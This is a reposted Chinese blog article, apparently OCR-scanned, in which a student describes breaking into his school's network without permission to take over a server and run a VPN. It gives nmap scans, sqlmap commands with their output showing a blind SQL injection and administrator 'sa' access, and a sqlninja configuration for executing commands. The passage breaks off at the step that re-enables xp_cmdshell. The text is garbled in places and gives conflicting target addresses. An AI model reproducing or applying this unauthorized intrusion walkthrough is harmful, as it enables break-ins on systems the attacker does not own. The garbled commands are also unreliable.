免费教程_免费网赚教程_破解版软件-寂涯网络学习基地

当前位置: 主页 > 网站相关 > 网站安全 > 渗透学校校园网并架设vpn

渗透学校校园网并架设vpn

时间:2012-05-01 15:06来源:未知 整理:寂涯网络 点击:

某次去机房突然看到了挂在墙上的网络拓扑图,从而了解整个学院的网络分布情况。正好泄露了网络拓扑结果,于是在了解拓扑结构的情况下,展开了一次渗透测试。在此题外话一句,不知为何现在的学校喜欢把网络拓扑图详细地贴在墙上,女友学校的网络拓扑图还竟然公开在学校的网站上,实在无语。我简略绘制本校的拓扑结构,如图1:
学校拓扑结构图
整个学院内部用的10.10.0.0网段的IP地址,学院有DHCP、DNS、Web、FTP服务器, 它们都共同位于10.10.8.0网段。
我们宿舍每个人的书桌下有网线插孔,从拓扑图中就可以看出,虽然没有开通上网,只要网线插上去,同样可以跨网段访问,也就是对web服务器可以访问的,经过扫描,还有不少内部网站,比如在线电影之类的。
我的想法是拿下某一台机器的权限,然后开个vpn来上网。为了长期使用,我选择了对服务器下手,先就选择了web服务器。顺便说下,我主要用的backtrack5作为渗透环境, 所使用的大部分工具均来源于BackTrack5中。
WEB服务器是在10.10.8.0这个网段的,首先用Nmap对整个网段进行扫描:
root§bt:^# nmap -sS -p 80 10. 10. 8.1-254 —open
其中,,参数代表只扫描指定端口,参数后跟欲扫描的端口号;--open的表示结果只显示开放了80端口的主机;10.10.8.1-254是1?地址的范围,指代10.10.8.1~10.10.8.254,
因为255是广播地址,所以只用扫到254即可。只用了3秒多,就扫描完了整个网段,结果如图2:
backtrack5扫描

我选择了 10.10.8.15这个目标站,因为它是asp.net架构的,如果有注入,较容易提权(后面事实证明的确非常好提权)。
打开以后竟然是一个旅游方面的网站,记得在学校某内部网站找到这个网站的链接,标明的是网络协会的,可见大学学生的东西有多杂。
随便点开了一则新闻的页面,然后用sqlmap扫描:
sqlmap. py -u "http://10. 10. 8. 51/Web/News/0piniondetail. aspx9id=54^
很快就返回了如下文字:_
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Place: GET Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=53’ AND 9442=9442 AND ’fVBu,=,fVBu
web server operating system: Windows 2003
web application technology: ASP. NET, Microsoft IIS 6. 0, ASP. NET 4. 0.30128 back-end DBMS: Microsoft SQL Server 2005 [*] shutting down at: 13:14:52
看来的确有注入,详细信息都在上面了,操作系统是windows 2003, 1186.0以及数据库是MSSQL 2005。立即看看数据库当前的用户名,提交如下命令:
/sqlmap. py -u "http://10. 10. 8. 51/Web/News/0piniondetail. aspx9id=54^
—current—user
以下是从sqlmap返回的一长串信息中摘下的:
[13:35:28] [INFO] fetching current user
[13:35:28] [INFO] read from file
’/pentest/database/sqlmap/output/10.10. 8. 51/session’ : sa

显示了当前用户名是sa,如果真的是sa权限,那么已经成功了一半以上了。提交以下 命令查看当前用户的权限:
• /sqlmap. py -u "http://10. 10. 8. 51/Web/News/0piniondetail. aspx9id=54^
—privileges
摘下的关键返回信息,如下:
database management system users privileges:
[*] nx
[*] sa (administrator)
果然是sa权限,赶紧换成sqlninja,Backtrack5中的Sqlninja是新版本,新版本的 Sqlninja已经不和以前的配置方法一样了,需要先建一个配置文件。在终端中键入touch 001^.001^建立一个配置文件,针对此次攻击,我的配置文件如下:
—httprequest_start—
GET http://10. 10. 8. 51/Web/News/0piniondetail. aspx?id=53’ ;/**/_SQL2INJECT_ HTTP/1.1
Host: 10. 10. 8. 51
User-Agent: Mozilla/5. 0 (X11; U; Linux i686; en-US; rv:l. 7.13) Gecko/20060418 Firefox/l. 0. 8 Connection: close —httprequest_end—
Sqlninja的配置文件格式用了标准的HTTP请求,以一httprequest_start—和--httprequest_end--—作为开始和结束,get中url后面的_sql2inject—会被sqlninja自动替换成相应的注入语句。
保存文件。由于SQL Server2005默认是禁用了 xp_cmdshell的,所以首先需要恢复 xp_cmdshell存储过程,键入命令:
root@bt:/pentest/database/sqlninja

本页地址 http://www.jybase.net/wangzhananquan/20120501889.html

百度搜索更多

谷歌搜索更多

顶一下
(4)
80%
踩一下
(1)
20%
------分隔线----------------------------

评价:
昵称: 验证码:点击我更换图片
推荐内容
赞助商
赞助商


关于本站免责声明视频更新google百度地图视频地图RRS订阅

如有什么问题请在本站留言,或发邮件到 hxt167#foxmail.com